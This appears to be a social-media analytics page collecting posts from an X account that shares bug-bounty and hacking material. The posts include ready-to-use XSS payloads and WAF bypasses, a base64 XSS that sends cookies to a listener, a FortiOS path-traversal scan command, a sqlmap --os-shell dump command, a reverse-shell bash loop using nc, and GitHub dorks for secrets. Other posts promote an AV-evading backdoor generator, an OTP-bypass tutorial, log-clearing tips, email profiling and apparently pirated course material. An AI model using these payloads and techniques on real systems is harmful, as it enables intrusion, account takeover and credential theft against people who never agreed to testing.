@TheMsterDoctor1 X

X posts on X about bounty, $googl, journey, bug the most. They currently have [------] followers and [---] posts still getting attention that total [-----] engagements in the last [--] hours.

Engagements: [-----] #

Mentions: [--] #

Followers: [------] #

CreatorRank: [---------] #

Social Influence

Social category influence technology brands stocks social networks finance celebrities countries cryptocurrencies premier league champions league

Social topic influence bounty #492, $googl, journey, bug, drop, if you, send, ip #877, the world, world of

Top accounts mentioned or mentioned by @savetonotion @threadreaderapp @gmailcom @c0d3cr4zy @elvtnx @tsv @csv @hakluke @h4x0rfr34k @examplecom @t3l3machus @albinowax @naglinagli @elhackernet @zhero @themasterdoctor1 @gmailcom27223e3csvgonloadalertxss3e @gmailcomsvgonloadalertxss @calcsh @ba

Top assets mentioned Alphabet Inc Class A (GOOGL) Story (IP) Cloudflare, Inc. (NET) Intercorp Financial Services Inc. (IFS)

Top Social Posts

Top posts by engagements in the last [--] hours

"While testing for CVE-2023-24488 I found various servers behind Akamai and since the original payload gives a Forbidden response I found this bypass: post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E"
X Link 2023-07-02T04:32Z 24.1K followers, [---] engagements

"ChatGPT was vulnerable to XSS via a Markdown link. I reported this at the end of March and haven't received any response from them yet but it was fixed some time later. This is the first time I found XSS in AI response. I believe this is not the last :) http://chat.openai.com http://chat.openai.com"
X Link 2023-07-07T08:34Z 24.1K followers, [----] engagements

"Title :- A path traversal vulnerability in the FortiOS SSL VPN web portal CVE-2018-13379 🪲 httpx -l ips.txt -path "/remote/fgt_langlang=/././././/////////dev/cmdb/sslvpn_websession" -status-code -mc [---] #BugBounty #bugbountytip #bugbountytips #Hacking #CyberSecurity"
X Link 2023-07-07T08:38Z 22.3K followers, 31K engagements

"Prototype-Pollution XSS /blog/__proto__transport_url=%3C%2fscript%3E%3Cscript%3Ealert(document.cookie)%3C%2fscript%3Eivl0w -- Endpoint blog Not Vulnerable /my.basket/__proto__transport_url=%3C%2fscript%3E%3Cscript%3Ealert(document.cookie)%3C%2fscript%3Eivl0w -- Endpoint"
X Link 2023-07-31T06:50Z 22.3K followers, 19.6K engagements

"🔍Top [--] GitHub dorks to find information disclosure vulnerabilities: [--]. filename:vim_settings.xml [--]. filename:secrets.yml [--]. filename:config.json [--]. filename:config.ini [--]. [--]. filename:c onfig.xml #BugBounty #bugbountytip http://config.properties http://config.properties"
X Link 2023-07-29T07:05Z 25K followers, 10.2K engagements

"nmap -sS -sV -Pn -O -A -sC iptarget -sS: SYN Scan -sV: Version/Service Info -Pn: skip host discovery -O: OS scan -A: OS version Detection -sC: equivalent to --script=default #BugBounty #bugbountytip"
X Link 2023-07-30T17:25Z 22.3K followers, 20K engagements

"A WAF bypass details/open=/Open/href=/data=;+ontoggle="(alert)(document.domain) Payload :- "Base Href=//X55.isx -- popedup xss Blocked: details/open=/Open/href=/data=+ontoggle="(alert)(document.domain) #bugbounty #hacking #cybersecurity #ethicalhacking #hacker"
X Link 2023-08-10T09:22Z 22.3K followers, 14.6K engagements

"🔍🛡 Pentesting Cheat Sheet - Your Guide to Smarter & Faster Testing 🛡🔍I've come across an invaluable repository filled with snippets of codes and commands tailored to optimize our pentesting routines. #ocsp"
X Link 2023-08-19T20:38Z 22.3K followers, 10.6K engagements

"Sucuri bypass payload by @0xc4gr1 sCriptalert(document.cookie)/sCript;/ Bypass XSS BIG-IP WAF ❌ details/open=/Open/href=/data=+ontoggle="(alert)(document.domain) ✅ details/open=/Open/href=/data=;+ontoggle="(alert)(document.domain) #BugBounty #BugBounty #"
X Link 2023-08-20T08:13Z 22.3K followers, [----] engagements

"Announced a new tool at @BSidesLeeds today: jsluice - for extracting URLs paths and secrets from JavaScript. It can do a couple of other cool things too - blog post and talk video coming soon :)"
X Link 2023-08-20T19:21Z 22.3K followers, [----] engagements

"Authorized camera access via Safari UXSS: the story of how a shared iCloud document can hack every website you've ever visited"
X Link 2023-08-22T05:19Z 22.3K followers, [----] engagements

"Easily Decompile APK's & Scan For Vulnerabilities - QuadraInspects framework integrates Andropass APKUtil and MobFS to automatically analyze APK files. - Repo: - Creator: @Morpheuslord2 - #infosec #bugbounty #bugbountytips #CTF #cybersecurity #apk"
X Link 2023-09-21T17:48Z 19.4K followers, [---] engagements

"All-in-One Scanning/Exploitation Tool - This tool scans for common vulnerabilities in different types of CMS platforms. - - Repo: Creator:@DionachCyber - - #infosec #CTF #bugbountytips #cybersecurityCMSMap"
X Link 2023-09-22T16:34Z 22.3K followers, 30.1K engagements

"SQLi Authentication Bypass - Master List (2022) - I've gathered a ton of payloads from various sources load these into your favorite fuzzing tool 🚀 - Link: - - #cybersecuritytips #infosec #CTF #bugbountytips https://pastebin.com/rKpsMp0g https://pastebin.com/rKpsMp0g"
X Link 2023-09-23T18:22Z 25K followers, 39.6K engagements

"Carnage - File Upload (Extension Bypass) - Using various techniques this tool will try to bypass file upload restrictions. See video below for more information. - Repo: - Video: - - #cybersecurity #bugbountytips #CTF #infosecurity"
X Link 2023-09-23T18:56Z 22.3K followers, [---] engagements

"LinWinPwn - Active Directory Vulnerability Scanner - Scan with the help of impacket bloodhound crackmapexec ldapdomaindump lsassy smbmap kerbrute adidnsdump and more. - Repo: - - #CyberSecurity #infosec #CTF #windows #AD #bugbountytips"
X Link 2023-09-23T18:59Z 19.4K followers, 41.8K engagements

"autoSSRF (Automatic SSRF Testing) - Smart fuzzing on relevant SSRF GET parameters and Context-based dynamic payload generation - Repo: - Creator: @Th0h0 - - #CyberSecurity #bugbountytips #infosec #CTF #tools"
X Link 2023-09-23T19:01Z 22.3K followers, 22K engagements

"Villain - (Undetectable Backdoor Generator) - Villain has a built-in auto-obfuscate payload function to assist in bypassing AV. Payloads are currently undetected - Repo: - Creator: @t3l3machus - - #CyberSecurity #infosec #CTF #windows #bugbountytips"
X Link 2023-09-24T17:18Z 16.6K followers, 23.7K engagements

"Log files to check for valuable information & clear system logs. - Here is a small list of UNIX locations to modify/view while you're on a machine. - #CyberSecurity #infosec #CTF #bugbounty"
X Link 2023-09-24T22:27Z 22.3K followers, [----] engagements

"AORT - Automated Recon (easy to use) - Checks for subdomains ports whois emails waybackmachine DNS and more - Repo: - Creator: @D3Ext - #cybersecuritytips #infosec #bugbountytips #CTF #recon #CTF #infosec #cybersecuritytips #cybersecurity #bugbounty"
X Link 2023-09-25T07:33Z 22.3K followers, 21.8K engagements

"Toxssin - (Incredible XSS Hook) - This is the best I've seen in quite a long time check out the video linked below for a demonstration. - Repo: - Video: - Creator: @t3l3machus - - #cybersecurity #bugbountytips #CTF #infosec"
X Link 2023-09-25T07:38Z 22.3K followers, 10.2K engagements

"SSRFire - Automated SSRF Finder - Tool to automate SSRF discovery with extra features to find XSS / Open Redirects. - Repo: - #infosec #CyberSecurity #CTF #BugBounty"
X Link 2023-09-25T07:51Z 22.3K followers, [----] engagements

""How can I improve this " any solution"
X Link 2023-09-25T20:26Z 22.3K followers, 42.1K engagements

"@007_isnuoT @albinowax @hakluke @naglinagli thank you redis is closes"
X Link 2023-09-25T22:19Z 22.3K followers, [---] engagements

"Reverse Shell Bash Loop: - while true; do sleep [--] && mknod /dev/shm/p p; cat /dev/shm/p /bin/bash -i nc 127.0.0.1 [----] /dev/shm/p; done - #CyberSecurity #CTF #bugbountytips"
X Link 2023-09-27T08:06Z 22.3K followers, 13K engagements

"@Rhynorater @albinowax @hakluke @naglinagli Hey @Rhynorater I found the the flag any other way to get reverse shell"
X Link 2023-09-29T02:05Z 28.1K followers, [---] engagements

"Recon Tool: Mantra Mantra by MrEmpy is a tool with the primary objective of searching for API keys in JavaScript files and HTML pages. It works by checking the source code of web pages and script files for strings that are identical or similar to API keys. #recon#API"
X Link 2023-10-02T01:46Z 13.9K followers, 15.2K engagements

"ChopChop - Quickly Discover Sensitive Endpoints/Files/Folders - Repo: - Creator: @michelin_eng - #cybersecuritytips #CybersecurityNews #bugbountytips #ctf #infosec"
X Link 2023-10-02T09:10Z 22.3K followers, 16.8K engagements

"SSRF / LFI / Remote Code Execution CSZCMS version 1.3.0 server-side request forgery exploit that leverages local file inclusion to inject a remote shell. #BugBounty #InfoSec #CyberSecurity #HackerOne #BugHunting #WebSecurity #PenTest #AppSec #CyberAttack @elvtnx"
X Link 2023-10-04T01:03Z 25.1K followers, 14.8K engagements

"SQL injection vulnerability that can be used to escalate privileges and execute code. #Exploit sqlmap -u --hex --time-sec=17 --dbms=mysql --technique=u --random-agent --eta -p account_type_number -D mims -T users --dump --os-shell ☝@elvtnx http://0day.gov/mims/updateacc http://0day.gov/mims/updateacc"
X Link 2023-10-05T02:47Z 28.1K followers, 16.2K engagements

"Free [--] Methods For Cloud Attacks(RTC0009) Original Post: #hacking #redteam #cybersecurity #cloud #cloudattacks #cloudsecurity #cloudpentest #aws #gcp #azure"
X Link 2023-10-07T03:31Z 22.3K followers, 19.7K engagements

"Who wants a slice of cyber knowledge with a side of humor 🍰🤣 Join us on this journey to explore the fascinating world of cybersecurity 💻 🔒 Follow for tech insights memes and the occasional cyber adventure. 🚀 Like ❤ and comment 'Yes' if you want to see this content Cross-site Scripting XSS Cheat Sheet #Cybersecurity #TechHumor #CyberAdventures #GeekLife #bugbountytips"
X Link 2023-10-09T02:24Z 19.4K followers, 42.9K engagements

"🔴 - - 🛡 Discover a comprehensive 71-page guide to Red Team Security Certification Preparation and more in the realm of #cybersecurity. Elevate your knowledge and skills in #pentesting #informationsecurity and unlock coveted #certifications. Dive into the world of ethical #hacking. 💻 Source: 👍 If you found this information valuable please give it a LIKE and share your thoughts in the comments below Your engagement and feedback fuel my commitment to bringing you the best cybersecurity insights. Let's continue this journey together 🚀🔒 #redteam #cybersecurity #pentest"
X Link 2023-10-09T06:32Z 22.3K followers, 59.1K engagements

"🔍 Bug Bounty Cheat Sheet 🐛🕵♂ Hey #Infosec folks Here's a comprehensive Bug Bounty Cheat Sheet to supercharge your security assessments. Cheers to my amazing followers 🚀🚀🍾🍾🍾🍾👇👇👇👇👇 If you find this content helpful please like and comment 'Yes.' 👍 Recon Workflow Horizontal & Vertical Correlations amass intel -org company name here amass intel -asn ASN Number Here amass intel -cidr CIDR Range Here amass intel -whois -d Domain Name Here amass enum -passive -d Domain Name Here Useful Lists and Resources SecLists by Daniel Miessler Subdomain Bruteforcing - CT_subdomains Subdomain"
X Link 2023-10-09T08:29Z [----] followers, 11.6K engagements

"🔍 Unlocking the Power of Google Dorks: Discover hidden online treasures with these expert tips and tricks. Learn how to search the web like a pro 💻🕵♂ If you like my content please give it a thumbs up 👍 and comment "Yes" for more valuable insights. Thank you followers 🙏💬 #LikeAndComment #ThankYouFollowers #GoogleDork #WebSearch #OnlineSearching #InformationDiscovery #CyberSecurity #SearchTechniques #DigitalInvestigation #DataMining #TechTips #InternetResearch #GoogleDorks #SearchSkills #WebSecurity"
X Link 2023-10-09T17:49Z 22.3K followers, [----] engagements

"😳😳Probably the best thing you'll see today🤯 🤯🤌🤌🚀🚀🚀🚀🚀🚀🚀 🔒 Free Offensive Security Notes PDF Courses + Video on OSCP OSWE OSEP OSED OSDA OSWA OSWE OSWP EXP301 EXP312 WEB300 CEH CEH v3 CEH v12 CCC CKLP Cisco CCNA 200-125 and more 📚 Get your hands on these resources: 🚀🚀Offensive Security-EXP301-Windows.User.Mode.Exploit.Development/ 🚀🚀Offensive Security-EXP312-Advanced macOS Control Bypasses OSMR Certification/ 🚀🚀Offensive Security-EXP312-Advanced macOS Control Bypasses OSMR Certification/ 🚀🚀Offensive Security-WEB300-Advanced.Web.Attacks.&.Exploitation/ 🚀🚀Offensive"
X Link 2023-10-13T08:18Z 22.3K followers, 18.1K engagements

"Just to clarify I don't own any of the content you find on Google. If someone has an issue with my posts they should reach out to the content's original owner and request removal. However please understand that I am not responsible for what you find on Google. Thank you for your understanding 😳😳Probably the best thing you'll see today.🤯🤯 🔒 Free Offensive Security Notes PDF Courses + Video on OSCP OSWE OSEP OSED OSDA OSWA OSWE OSWP EXP301 EXP312 WEB300 CEH CEH v3 CEH v12 CCC CKLP Cisco CCNA 200-125 and more 📚 Get your hands on these resources: 🚀🚀Offensive"
X Link 2023-10-14T02:11Z 22.3K followers, [--] engagements

"😳Probably the best thing you'll see today🤯 🔒 Free Offensive Security Notes PDF Courses + Video on OSCP OSWE OSEP OSED OSDA OSWA que OSWE OSWP EXP301 EXP312 WEB300 CEH CEH v3 CEH v12 CCC CKLP Cisco CCNA 200-125 and more🚀🚀🚀🚀🚀🚀🚀🚀🚀🚀🚀🚀🚀🚀🚀🚀🚀🚀🚀🚀 "Just to make things clear for my followers I want to emphasize that I don't have ownership over any content found on Google If anyone has concerns about my posts they should contact the original content creators to request removal. Please remember that I cannot control what you come across on Google. Your understanding is greatly"
X Link 2023-10-14T06:52Z 19.4K followers, 49K engagements

"🛡 Exploring Cross-Site Scripting (XSS): img onload="eval(atob('2G9jdW1lbnQubG9jYXRpb249ImhodHA6Ly9saXNOZXJuSVAvlitkb2 NIbWVudC5jb29raWU=)" Objectives: This represents Base [--] encoding exploitation. A HREF="http://6 6.000146.0x7.147/"XSS/A Objective: This represents the Mixed encoding exploitation vector. A HREF="//google"XSS/A Objective: This represents the protocol resolution bypass vector part [--]. A HREF="http://ha.ckers. org@google"XSS/A Objective: This represents the protocol resolution bypass vector part [--]. A Objective: This represents the protocol resolution bypass vector part [--]. A"
X Link 2023-10-20T06:51Z [----] followers, [----] engagements

"OSCP Cheat Sheet🚀🚀🚀👌👌👌 Since this little project get's more and more attention 👉👉@syr0_ dicide to update it as often as possible to focus more helpful and absolutely necessary commands for the exam Repo: This repository will also try to cover as much as possible of the tools required for the proving grounds boxes. #OSCP #InfoSec #PenTest #CyberSecurity #HackTheBox #EthicalHacking #Pentesting #RedTeam #TryHarder #CertificationGoals"
X Link 2023-10-21T01:59Z [----] followers, 17.2K engagements

"Free Offensive Security Notes (OSCP OSWE OSEP OSED OSWA OSMR OSDA) 🚀🚀🚀🚀🚀🚀🚀🚀🚀🚀🚀🚀 I want to express my heartfelt gratitude for having the most incredible mentor @C0d3Cr4zy. Your dedication and expertise in creating outstanding content have made it accessible for everyone to learn Thank you Credit:@C0d3Cr4zy OSCP NOTES ACTIVE DIRECTORY: OSCP Notes : OSWE Notes: OSWA Offensive Security Web Attacks: OSDA Offensive Security Defense Analyst OSMR Offensive Security MAC Control Bypass All my followers Remember to keep trying harder and never stop learning Oh I'd like to thank my haters for"
X Link 2023-10-22T18:42Z 22.3K followers, [----] engagements

"OSCP-Survival-Guide. Kali Linux Offensive Security Certified Professional . NOTE: This document refers to the target ip as the export variable $ip. Penetration Testing Study Notes This repo contains all my penetration testing study notes penetration testing tools scripts techniques tricks and also many scripts that I found them useful from all over the internet. Credit: @WWong99 Repo: #oscp #hacking #ceh #cybersecurity #hacker #ethicalhacking #kalilinux #infosec #pentesting #hackers #cissp #ethicalhacker #linux #cybersecuritytraining #sqlinjection #cybersecurityawareness #bugbounty"
X Link 2023-10-24T01:45Z 22.5K followers, 31.6K engagements

"Unlock the power of cybersecurity with this comprehensive OSCP Guide 🛡💻 Whether you're a seasoned pro or just starting out this repository by 👉👉👉MAX-P0W3R has everything you need to supercharge your OSCP journey. From cheat sheets to walkthroughs it's your one-stop destination for success. Don't miss out on this invaluable resource. Check it out now Repo: #OSCP #Cybersecurity #InfoSec #oscp #hacking #ceh #cybersecurity #hacker #ethicalhacking #kalilinux #infosec #pentesting #hackers #cissp #ethicalhacker #linux #cybersecuritytraining #sqlinjection #cybersecurityawareness #bugbounty"
X Link 2023-10-24T04:31Z [----] followers, [----] engagements

"Amazing Google Dorks for Bug Bounty Input your target to generate Google Dork links for easy OSINT recon #bugbountytips Credit: @TakSec"
X Link 2023-10-27T03:36Z [----] followers, 19.1K engagements

"👋 Hey there amazing Twitter community 🚀 I'm excited to connect with all of you. Let's build a network of like-minded individuals. 🚀 Exciting Opportunity Unlock the secret [---] PDF Course and Notes🔒🔒💻💻🚀🚀🚀🚀 📖📖Perfect for those aspiring to conquer Offensive Security Notes (OSCP OSWE OSEP OSED) Get it Now for FREE The first 1000people comment 'YES.' I will send the link privately for every single one who comments 'yes.' And wait [--] minute and you will receive the link in your inbox 📥. Follow like and comment if you'd like to be a part of this journey 🤝 Feel free to send me a DM and"
X Link 2023-11-02T04:02Z [----] followers, 37.4K engagements

"Are you aspiring to conquer the challenging OSCP exam and level up your cybersecurity skills 🛡 Look no further I'm excited to share with you an incredible resource a meticulously curated list of awesome OSCP resources hosted on GitHub. 🚀 Whether you're just starting your OSCP journey or are a seasoned infosec professional this treasure trove has something for everyone. Inside you'll discover a wealth of knowledge including: 📚 In-depth OSCP reviews and guides to help you understand the exam's intricacies. 🔑 Cheatsheets and scripts to streamline your penetration testing. 💻 Topics covering"
X Link 2023-11-04T06:50Z [----] followers, 15.5K engagements

"🔴 Excited to share the RedTeam Blueprint - A Unique Guide to Ethical Hacking 🚀🔒 [--] Penetration Testing Process - [--] files [--] The Windows Operating System - [--] files [--] The Linux Operating System - [--] files [--] Operating System Internals - [--] files [--] Active Directory - [--] files [--] Kerberos - [--] files [--] Data Manipulation - [--] files [--] Networking - [--] files [--] VPNs - [--] files 🔥 [--] Firewalls - [--] files 🔒 [--] Configuring PFSense Firewalls - [--] files 📚 [--] Program Theory - [--] files 🐍 [--] Python Course - [--] files 💡 [--] Assembly Course - [--] files 🔍 [--] Scope Identification - [--] files 📋 [--] Reconnaissance -"
X Link 2023-11-08T05:24Z 11.2K followers, 23.2K engagements

"📚 Exciting news Check out this incredible collection of premium courses curated by server_z for your educational journey: [--] ITIL [--] Windows [--] Courses [--] PowerShell [--] Outlook [---] [--] Linux [--] Customer Services [--] Group Policy [--] MCSA [----] [--] MCSA [----] 🔟 Outlook [----] [--] SCCM [--] Azure: AZ900 AZ104 AZ500 [--] Azure: AZ304 [--] Azure: AZ303 [--] User Experience Design [--] Citrix [--] MCSA - CBT Nuggets [--] CCSP [--] Cisco Certified CyberOps Unlock the knowledge with the provided links and password: _. 🚀 Dive into these courses for educational purposes and elevate your skills #LearningOpportunities"
X Link 2023-11-09T05:04Z 11.5K followers, 38.3K engagements

"📚 Explore a treasure trove of cybersecurity knowledge 🛡 FREE Cybersecurity Book is now accessible via Google Drive: Enhance your online safety with valuable insights. Grab your copy now #CybersecurityBooks #FreeDownload #OnlineSafety Books"
X Link 2023-11-10T10:24Z 12.4K followers, 34.8K engagements

"🚨 Attention Cyber Enthusiasts 🔐 Check out this curated collection of [---] FREE PDFs to elevate your Cyber Security expertise 💻 🔒 Explore the Drive now and boost your knowledge in the realm of #cybersecurity #hacking and #infosecurity. Drive Link: Note 📢 Heads up I'm not the owner of this content; use it responsibly. If you have questions or want to discuss further feel free to message me directly. I'm here to answer everyone. Let's engage in a cyber-savvy conversation 🌐💬. Happy learning 👩💻👨💻 ecurity https://drive.google.com/drive/mobile/folders/179D_slEOLXWOTeFdmRrMkdV8C4DSLdYT"
X Link 2023-11-15T03:31Z 28.4K followers, 23.2K engagements

"If you want to learn CYBERSECURITY for FREE this THREAD is for you. Here are Loads of FREE RESOURCES (Courses Certifications Communities Internship opportunities) to get you STARTED. [--]. Cisco CCNA Cyber Ops Associate 200-201 - MEGA [--]. Cybersecurity FULLY LOADED by Simplilearn [--]. Cybersecurity FULL course by EDUREKA [--]. Awesome Cybersecurity University [--]. Cybersecurity books for beginners [--]. Cybersecurity Documents There's still more in the thread (👇) Kindly Repost and TAG your friends/families that may need this"
X Link 2023-11-15T21:19Z 15K followers, 248.4K engagements

"🤌🤌Embark on a comprehensive journey to mastery with the 🚀🚀🚀🚀🚀🚀 👉Cisco CCNA 200-301 Exam Complete Course. 🚀 Unlock [---] immersive labs for hands-on learning ensuring a solid foundation in networking. Link: 🌐 Elevate your skills and conquer the CCNA certification. #CCNA #Networking #CiscoCertified https://mega.nz/folder/Bro0kIpY#5bxE_48py3JRf8NmSYsINA https://mega.nz/folder/Bro0kIpY#5bxE_48py3JRf8NmSYsINA https://mega.nz/folder/Bro0kIpY#5bxE_48py3JRf8NmSYsINA https://mega.nz/folder/Bro0kIpY#5bxE_48py3JRf8NmSYsINA"
X Link 2023-11-22T07:59Z 24.1K followers, 16.8K engagements

"@jonathandata1 @Apple 🔥"
X Link 2023-11-22T09:03Z 12.3K followers, [--] engagements

"Exciting news 🌟 I'm sharing [---] PDF files packed with valuable content for FREE 100% Free Don't Miss 👾 Simply: [--]. Follow (So I Will Dm) 📥 [--]. Like and Repost [--]. Comment Send to receive your copies 📚 Let's learn together 🚀 #FreeLearning #KnowledgeSharing"
X Link 2023-11-25T06:27Z 24.2K followers, 37.2K engagements

"🕵♂ Today's shoutout to bug bounty hunters and penetration testers 🔍 Here are [--] websites that can level up your game: Links: Happy hunting 🚀 #BugBounty #PenTest #Cybersecurity 🛡 https://azuremarketplace.microsoft.com/en-us/marketplace/apps/kali-linux.kali https://vulners.com/ https://grep.app/ https://app.netlas.io/ https://fullhunt.io/ https://grep.app/ https://azuremarketplace.microsoft.com/en-us/marketplace/apps/kali-linux.kali https://fullhunt.io/ https://app.netlas.io/ https://x.com/TheMsterDoctor1/status/1728659508107362323/photo/1 https://vulners.com/"
X Link 2023-11-26T06:18Z 25.1K followers, 45.2K engagements

"Screenshot working code. This tool lets you upload a screenshot of any website and convert it into HTML / Tailwind CSS. The link to access this tool:"
X Link 2023-11-27T05:23Z 15.6K followers, [----] engagements

"Excited to embark on the CEH v11 journey 🚀 Ready to dive into the world of ethical hacking and enhance my cybersecurity skills. #CEHv11 #EthicalHacking #Cybersecurity 100% Free For First [----] User's. Simply: [--]. Follow (So I Will Dm) 📥 [--]. Like and Repost [--]. Comment Send to receive your copies 📚"
X Link 2023-11-27T05:30Z 13.2K followers, [---] engagements

"New [---] TB Tutorials + Books + Courses + Trainings + Workshops + Educational Resources 😀 Data science Python Data Analytics AWS Certified BIG DATA BI Machine Learning and more. Simply: [--]. Follow (So I Will Dm) [--]. Like and Repost [--]. Comment "Send" #python #DataScience"
X Link 2023-11-27T05:47Z 14.3K followers, [----] engagements

"Lasted CVE ✌✌🔥🔥😉😉 Mass-Bruter - Mass Bruteforce Network Protocols"
X Link 2023-11-27T23:33Z 14.4K followers, [----] engagements

"CVE-2023-36745: Microsoft Exchange Server RCE PoC:"
X Link 2023-11-27T23:33Z 13.6K followers, [--] engagements

"Visual Studio Code Security: Finding New Vulnerabilities in the NPM Integration (3/3)"
X Link 2023-11-27T23:34Z 13.9K followers, [--] engagements

"CVE-2023-22516: Critical RCE Vulnerability Discovered in Atlassian Bamboo"
X Link 2023-11-27T23:35Z 14K followers, [--] engagements

"CVE-2023-37924: Apache Submarine SQL Injection Vulnerability"
X Link 2023-11-27T23:35Z 13.6K followers, [--] engagements

"Proof of Concept for CVE-2023-38646 This vulnerability has been declared as critical because it allows an unauthenticated attacker to execute arbitrary commands with the same privileges as the Metabase server. This vulnerability means the Metabase server can become a potential entry point for malicious attacks which could compromise the integrity of the whole system it operates on"
X Link 2023-11-27T23:35Z 13.9K followers, [--] engagements

"CVE-2023-36874: Windows LPE"
X Link 2023-11-27T23:35Z 13.6K followers, [--] engagements

"CVE-2023-29360 #Exploit for CVE-2023-29360 targeting MSKSSRV.SYS driver"
X Link 2023-11-27T23:36Z 13.9K followers, [--] engagements

"CVE-2023-22515: Confluence Broken Access Control https://github.com/Chocapikk/CVE-2023-22515 https://github.com/Chocapikk/CVE-2023-22515"
X Link 2023-11-27T23:36Z 25K followers, [--] engagements

"Researchers Published PoC Exploit for Windows Zero-Day CVE-2023-36025 Vulnerability"
X Link 2023-11-27T23:36Z 13.9K followers, [--] engagements

"Researchers Published PoC Exploit for Windows Zero-Day CVE-2023-36025 Vulnerability"
X Link 2023-11-27T23:36Z 14K followers, [--] engagements

"CVE-2023-2598 LPE PoC of a vulnerability in the io_uring subsystem of the Linux Kernel. #cve #cybersecurity #infosec"
X Link 2023-11-27T23:37Z 14K followers, [---] engagements

"CVE-2023-46302: Critical Apache Submarine RCE Vulnerability"
X Link 2023-11-27T23:37Z 13.5K followers, [---] engagements

"Splunk RCE Vulnerability Let Attackers Upload Malicious File"
X Link 2023-11-27T23:37Z 14.6K followers, [---] engagements

"Here's a small #XSS list for manual testing (main cases high success rate). "img src onerror=alert(1) "autofocus onfocus=alert(1)// /scriptscriptalert(1)/script '-alert(1)-' '-alert(1)// javascript:alert(1) Try it on: - URL query fragment & path; - all input fields. A nice way to store the payload "scripteval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))/script A payload to bypass Akamai WAF A href="javascrip%09t:eval.apply$jj.className+(23)" id=jj class=alertClick Here Another one "img/src/style=html:url("data:"svg/onload=confirm(69)") BlindXSS-Payloads: #Max"
X Link 2023-12-05T10:24Z 16.9K followers, [----] engagements

"@eagle_0408"
X Link 2023-12-07T12:17Z 15K followers, [--] engagements

"😳😳Probably the best thing you'll see today.🤯🤯 🔒 Free Offensive Security Notes PDF Courses + Video on OSCP OSWE OSEP OSED OSDA OSWA OSWE OSWP EXP301 EXP312 WEB300 CEH CEH v3 CEH v12 CCC CKLP Cisco CCNA 200-125 and more 🌐 Found Interesting Information 🌐 I came across some fascinating information on the web through Google and I wanted to share it with all of you. Please note that this content is not mine and I do not own it. All credit goes to the original source. If you have any questions or concerns please communicate with the content owner directly. Let's enjoy learning and exploring"
X Link 2023-12-08T11:42Z [----] followers, 14.8K engagements

"🔖8000+ XSS Payloads GitHub : github 🐈 : #bugbounty #Infosec #xss Share & Support Us ➯ https://github.com/radhasec/xss_payload https://github.com/payloadbox/xss-payload-list https://github.com/radhasec/xss_payload https://github.com/payloadbox/xss-payload-list"
X Link 2023-12-09T12:20Z 25.1K followers, 23.5K engagements

"List of the most secure privacy email providers. Most of these companies will not co-operate with Law Enforcement and the content is encrypted. Share & Support Us"
X Link 2023-12-09T12:21Z 16.6K followers, 10.5K engagements

"😉Unlocking the potential of AI & ChatGPT for making money online 🚀 Dive into my dual guides for a roadmap to online income and steady revenue streams. 100% Free For First [----] User's. Simply: [--]. Follow (So I Will Dm) 📥 [--]. Like and Repost [--]. Comment Send to receive your link 📚 "I do not own this content. For any issues or concerns please contact the rightful owner directly." 💸💻 #AI #ChatGPT #OnlineIncome #SideHustle""
X Link 2023-12-10T07:34Z 15.5K followers, [----] engagements

"Linux+ notes You can share these if you want but you can't sell/use them as part of any paid training. Built by my VA. I won't share her name because then some of you will try hacking her. plus I don't want anyone to hire her away because it's tough to find high performers. ☝☝☝☝☝last link only work outside of twiter. Copy paste outside of twitter"
X Link 2023-12-12T00:16Z 18.8K followers, 21.5K engagements

"☘HOW TO BYPASS OTP VERIFICATION✅ Bypass OTP verifications from Paypal Instagram.and many others using a Discord Bot and telegram Bot or the private API Tutorials -"
X Link 2023-12-12T02:32Z 18.5K followers, 23.6K engagements

"🔥 Mr. Robot Walkthrough 🔥 🔋 Full walkthrough exploiting the machine.Getting all the keys 📥 Tools Used - 🟢Netdiscover 🟢Nmap 🟢Netcat 🟢Python 🟢GTFObins 🟢Hacking wordpress 🟢Hydra ✅ Mega Download Link - 👨💻 JOIN FOR MORE 👨💻 @TheMsterDoctor1"
X Link 2023-12-12T02:33Z 16.9K followers, [----] engagements

"100% Free For First [----] User's. Simply: [--]. Follow (So I Will Dm) 📥 [--]. Like and Repost [--]. Comment Send to receive your copies 📚 "I do not own this content. For any issues or concerns please contact the rightful owner directly.""
X Link 2023-12-12T05:06Z 15.6K followers, [----] engagements

"Reverse Shell Bash Loop: while true; do sleep [--] && mknod /dev/shm/p p; cat /dev/shm/p /bin/bash -i nc 127.0.0.1 [----] /dev/shm/p; done"
X Link 2023-12-12T10:06Z 28.1K followers, [----] engagements

"🎭 COMPLETE DARK WEB COURSE 🎭 ➡ Introduction to Deep Web. ➡ Setting up the environment. ➡ Hands on with the Deep web. ➡ Deep web link Directories. ➡ Bit coin and Crypto-currency on the Dark web. ➡ PGP tutorial. ➡ How to create and host Deep web. ➡ How to access the Deep web on Android. 🗃 Link - ❣ SHARE AND SUPPORT ❣"
X Link 2023-12-13T03:17Z 19.4K followers, 37.5K engagements

"An Akamai WAF bypass payload 1'"A HRef=" AutoFocus OnFocus=top/**/.'ale'%2B'rt'(1) #WAF #Bypass"
X Link 2023-12-13T03:26Z 15.9K followers, [---] engagements

"🔖IP-search engines (Netlas Shodan Fofa) can be used to find links to various interesting content on sites that are not indexed by Google. Example of a query for Netlas: http.body:osint.pdf replace osint to other keyword and pdf to any other file ext github : Share & Support Us"
X Link 2023-12-13T22:23Z 18.9K followers, 15.5K engagements

"Nuclei Templates AI Generator Nuclei Template Editor - AI-powered hub to create debug scan and store templates. Covering a wide array of vulnerabilities using public templates & rich CVE data. Note: Current focus is HTTP more protocols coming soon Source: #nuclei #template #generator Share & Support Us"
X Link 2023-12-13T22:25Z 19.4K followers, [----] engagements

"Cyber Security Docs Happy learning #cybersecurity #learning"
X Link 2023-12-14T07:16Z 19.4K followers, 37.8K engagements

"😉Getting information through the mail🤟 Here's what we can get: - Owner's name - Date of last edit - Google id - Possible YouTube channel - Possible names - Public photos - Phone models - Firmware phones - Possible physical location Installation: $ apt update $ apt upgrade $ apt install git python $ git clone $ pip3 install -r requirements.txt $ python check_and_gen.py $ python example@gmail.com"
X Link 2023-12-16T13:01Z 19.4K followers, 13.8K engagements

"➕ USEFUL WEBSITES FOR PENTESTERS & HACKERS ➕ Exploits Database 💥 Vulnerabilities Database 🎯 Hacking Tutorials 💻 Virus Scan 🦠 --Not distribute to AV-- Tools Download 🛠"
X Link 2023-12-18T08:19Z 19.4K followers, 24K engagements

